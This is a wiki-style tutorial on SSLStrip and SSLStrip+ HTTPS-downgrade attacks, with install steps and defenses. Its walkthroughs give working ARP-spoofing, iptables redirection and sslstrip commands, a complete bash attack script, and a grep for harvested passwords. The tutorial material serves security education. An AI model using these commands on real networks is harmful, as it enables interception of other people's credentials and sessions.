A tool from Moxie Marlinspike for performing HTTPS stripping attacks.

Also see SSLSniff, Bettercap, MITMf.

Overview

SSLStrip is a Man-in-the-Middle (MITM) tool that implements Moxie Marlinspike's SSL stripping attacks, first presented at Black Hat DC 2009 in the talk "New Tricks for Defeating SSL in Practice". The tool transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and maps those links into look-alike HTTP links or homograph-similar HTTPS links, effectively downgrading secure connections to plaintext.

The core insight behind SSLStrip is that users rarely type https:// directly into their browsers. Instead, they typically arrive at secure pages through one of two paths:

1. Clicking an HTTP link that redirects to HTTPS (via a 301/302 redirect or a meta-refresh)
2. Clicking a link on an HTTP page that points to an HTTPS URL

SSLStrip exploits both of these transitions by intercepting them and forcing the victim's browser to continue communicating over unencrypted HTTP, while the attacker maintains a separate HTTPS connection to the legitimate server.

Attack Model

The attack follows this communication pattern:

Victim  <== HTTP ==>  Attacker  <== HTTPS ==>  Web Server

The attacker sits between the victim and the server, maintaining two separate connections:

• Victim-to-Attacker: Unencrypted HTTP. The victim believes they are communicating with the legitimate server.
• Attacker-to-Server: Encrypted HTTPS. The server believes it is communicating directly with the victim.

All data passing through the attacker is visible in plaintext, including login credentials, session cookies, and personal information.

How SSLStrip Works

SSLStrip performs several key transformations on traffic:

HTTPS Link Rewriting

The tool parses all HTTP traffic passing through it and replaces occurrences of https:// with http:// in HTML content (links, form actions, redirects, etc.). This prevents the victim's browser from ever initiating an HTTPS connection.

For example, a login link like:

<a href="https://example.com/login">Login</a>

...is rewritten to:

<a href="http://example.com/login">Login</a>

Redirect Stripping

When a server responds with an HTTP 301/302 redirect pointing to an HTTPS URL (a common pattern for sites that enforce HTTPS), SSLStrip intercepts the redirect and changes the Location header from https:// to http://. The victim's browser then follows the rewritten redirect over plain HTTP.

Favicon Spoofing (Lock Icon)

SSLStrip can substitute a padlock favicon on secure-looking requests (-f flag). When the victim's browser renders the page, the address bar may appear to show a lock icon in the tab, giving a false sense of security.

Session Killing

The -k flag enables session denial: SSLStrip kills existing sessions in progress, forcing victims to re-authenticate. This is useful for capturing credentials that might otherwise remain cached.

Modern Limitations: HSTS

The primary defense against SSLStrip is HTTP Strict Transport Security (HSTS), defined in RFC 6797. When a browser visits an HSTS-enabled site over HTTPS, the server sends a Strict-Transport-Security header instructing the browser to always use HTTPS for that domain for a specified duration (e.g., max-age=31536000 for one year).

Once HSTS is cached by the browser:

• All HTTP requests to that domain are internally upgraded to HTTPS before leaving the browser.
• Certificate errors are treated as fatal (no click-through warnings).
• SSLStrip cannot intercept or downgrade the connection.

Furthermore, browsers maintain HSTS preload lists — a hardcoded set of domains (including google.com, facebook.com, twitter.com, and many others) that are always forced to HTTPS, even on first visit. This effectively neuters SSLStrip against those sites.

SSLStrip+ and HSTS Bypass

To counter HSTS, an extended version called SSLStrip+ (also referred to as sslstrip2) was developed by Leonardo Nve. It adds techniques to bypass HSTS protection:

Homograph / Look-Alike Domains

SSLStrip+ rewrites HTTPS URLs to use visually similar domain names that are not on the HSTS preload list. For example, https://www.paypal.com might become http://www.paypaI.com (where the 'l' is replaced with an uppercase 'I').

DNS Spoofing Integration

Because the rewritten domains (with homograph substitutions) are fake, SSLStrip+ requires a companion DNS server (such as dns2proxy) to resolve the fake hostnames back to the attacker's machine. The DNS server intercepts queries for the spoofed domains and returns the attacker's IP address.

Delorean / NTP Attacks

Another HSTS bypass technique uses Delorean, an NTP MITM tool by Jose Selvi. Delorean manipulates NTP traffic to set the victim's system clock far into the past (e.g., before a site's HSTS policy was issued), causing cached HSTS entries to appear expired. Combined with SSLStrip+, this can defeat HSTS on sites not in the preload list.

Source Code

Installing

Kali Linux

$ sudo apt-get install sslstrip

From Source (Original)

$ git clone https://github.com/moxie0/sslstrip.git
$ cd sslstrip
$ sudo python setup.py build && sudo python setup.py install

SSLStrip+ (HSTS Bypass Fork)

$ git clone https://github.com/LeonardoNve/sslstrip2.git
$ cd sslstrip2
$ sudo python setup.py install

Dependencies

sslstrip requires the python-twisted package:

$ sudo apt-get install python-twisted-web

Getting Help

$ sslstrip -h

sslstrip 1.0 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

Important Flags

Full Attack Walkthrough

A complete SSLStrip attack involves three steps: enabling packet forwarding, setting up iptables redirection, and running ARP spoofing to redirect victim traffic.

Step 1: Enable IP Forwarding

By default, a Linux machine drops packets not destined for its own IP. Forwarding must be enabled so the attacker's machine routes victim traffic:

# echo "1" > /proc/sys/net/ipv4/ip_forward

To make this persistent across reboots, edit /etc/sysctl.conf:

net.ipv4.ip_forward = 1

Then apply:

# sysctl -p

Step 2: iptables Redirection

Set up an iptables rule to redirect incoming HTTP traffic (port 80) to the port SSLStrip is listening on (e.g., port 6666):

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

Verify the rule:

# iptables -t nat -L -n -v

To remove the rule after the attack:

# iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

Step 3: ARP Spoofing

Redirect the victim's traffic through the attacker's machine using ARP spoofing. This convinces the victim that the attacker's MAC address belongs to the gateway, and vice versa:

# arpspoof -i eth0 -t <victim_ip> <gateway_ip>
# arpspoof -i eth0 -t <gateway_ip> <victim_ip>

Alternatively, use Ettercap:

# ettercap -T -M arp:remote /<gateway_ip>/ /<victim_ip>/

Or use Bettercap:

$ sudo bettercap -eval "net.probe on; net.sniff on; arp.spoof on"

Step 4: Run SSLStrip

Launch SSLStrip on the designated port:

$ sslstrip -l 6666 -w /tmp/sslstrip.log -a

The -a flag logs all SSL and HTTP traffic, and -w writes output to a log file.

Step 5: Monitor Captured Data

View captured credentials and session data in real time:

$ tail -f /tmp/sslstrip.log

Or search for specific patterns (e.g., passwords):

$ grep -i "password\|passwd\|pass" /tmp/sslstrip.log

Full Script

A complete attack script combining all steps:

#!/bin/bash
# sslstrip attack script
VICTIM_IP="192.168.1.100"
GATEWAY_IP="192.168.1.1"
INTERFACE="eth0"
STRIP_PORT="6666"

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $STRIP_PORT

echo "Starting ARP spoofing..."
arpspoof -i $INTERFACE -t $VICTIM_IP $GATEWAY_IP &
arpspoof -i $INTERFACE -t $GATEWAY_IP $VICTIM_IP &

echo "Starting SSLStrip on port $STRIP_PORT..."
sslstrip -l $STRIP_PORT -w /tmp/sslstrip.log -a

SSLStrip+ Attack Walkthrough (HSTS Bypass)

When targeting sites protected by HSTS, use SSLStrip+ with dns2proxy:

Step 1: Enable Forwarding and iptables

# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Step 2: Run dns2proxy

dns2proxy intercepts DNS queries and resolves spoofed homograph domains back to the attacker:

$ cd dns2proxy
$ python dns2proxy.py

Step 3: Run SSLStrip+

$ cd sslstrip2
$ python sslstrip.py -a -w /tmp/sslstrip.log

Step 4: ARP Spoof

# arpspoof -i eth0 -t <victim_ip> <gateway_ip>
# arpspoof -i eth0 -t <gateway_ip> <victim_ip>

Defenses and Countermeasures

Server-Side Defenses

• Enable HSTS: Add the Strict-Transport-Security header with a long max-age and the includeSubDomains directive.
• HSTS Preload: Submit your domain to the browser HSTS preload list at hstspreload.org. This hardcodes HTTPS enforcement into browsers.
• HTTPS-Only: Serve content exclusively over HTTPS. Do not run an HTTP listener at all, or use it only to serve a permanent redirect to HTTPS.
• Secure Cookies: Set the Secure flag on all cookies so they are never transmitted over HTTP.

Client-Side Defenses

• HTTPS Everywhere: Browser extension by the EFF that forces HTTPS on sites with known HTTPS support.
• Always Type HTTPS: Manually type https:// when visiting sensitive sites.
• VPN: A VPN encrypts all traffic between the client and the VPN server, preventing local-network MITM attacks.
• Monitor Certificate Warnings: Never bypass browser certificate warnings.

Related Tools

• SSLSniff — Another Moxie Marlinspike tool for performing certificate-based MITM attacks against SSL/TLS.
• Bettercap — A modern, comprehensive MITM framework with built-in SSLStrip, HSTS bypass, and DNS spoofing modules.
• MITMf — Man-in-the-Middle Framework with SSLStrip+ integration, BeEF hooking, and credential harvesting.
• Ettercap — Classic MITM suite supporting ARP poisoning and traffic filtering.
• dns2proxy — Companion DNS proxy for SSLStrip+ that resolves spoofed homograph domains.
• Delorean — NTP MITM tool for manipulating system time to expire HSTS entries.

See Also

• Iptables
• ARP Spoofing
• Man in the Middle

Flags

monkey in the middle attacks in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker. MITM Wireless Attacks: MITM/Wireless Wired Attacks: MITM/Wired Layer 1 and 2 MITM Attacks: MITM/Layer 1 and 2 Network Tap: MITM/Wired/Network Tap Evil Twin Attack: Evil Twin  · MITM/Evil Twin Layer 3 and 4 MITM Attacks: MITM/Layer 3 and 4 Traffic Sniffing: MITM/Sniffing ARP Poisoning: MITM/ARP Poisoning Traffic Injection/Modification: MITM/Traffic Injection DNS Attacks: MITM/DNS  · Bettercap/Failed DNS Spoofing Attack  · Bettercap/Failed DNS Spoofing Attack 2 DHCP Attacks: MITM/DHCP WPAD MITM Attack: MITM/WPAD Port Stealing: MITM/Port Stealing Rushing Attack: MITM/Rushing Attack Attacking HTTPS: MITM/HTTPS Layer 5 MITM Attacks: Session Hijacking: MITM/Session Hijacking Toolz: Ettercap  · Bettercap  · MITMf  · EvilFOCA Wireshark  · Aircrack Dsniff  · Arpspoof  · Dnsspoof SSLSniff  · SSLStrip  · Frankencert Driftnet  · Karma MITM Labs: {{MITMLabs}} Category:MITM  · Category:Attacks  · Category:Kali Attack Layers Template:MITMLabs  · Template:MITMFlag Flags  · Template:MITMFlag  · e